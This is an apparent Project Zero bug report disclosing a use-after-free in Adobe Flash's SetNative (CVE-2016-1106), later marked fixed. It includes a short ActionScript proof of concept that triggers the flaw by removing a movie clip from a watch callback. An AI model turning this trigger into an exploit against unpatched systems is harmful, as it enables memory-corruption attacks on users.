New issue
Advanced search Search tips
Starred by 3 users
Status: Fixed
Owner:
Closed: May 2016
Cc:



Sign in to add a comment
Adobe Flash: Use-after-free in SetNative
Project Member Reported by natashenka@google.com, Apr 12 2016 Back to list
There is a use-after-free in SetNative. If a watch is placed on a native that is initialized by SetNative, it can delete the object the set is being called on, leading to a use-after-free. A minimal PoC follows:

var t = this.createEmptyMovieClip("t", 1);
t.watch("a", func);
ASSetNative(t, 106, "a,b");
			
			
function func (){
	
	t.removeMovieClip();
	
	}

A swf and fla are attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

 
setnative.swf
665 bytes Download
setnative.fla
4.6 KB Download
Project Member Comment 1 by natashenka@google.com, May 16 2016
Labels: -Restrict-View-Commit CVE-2016-1106
Status: Fixed
Sign in to add a comment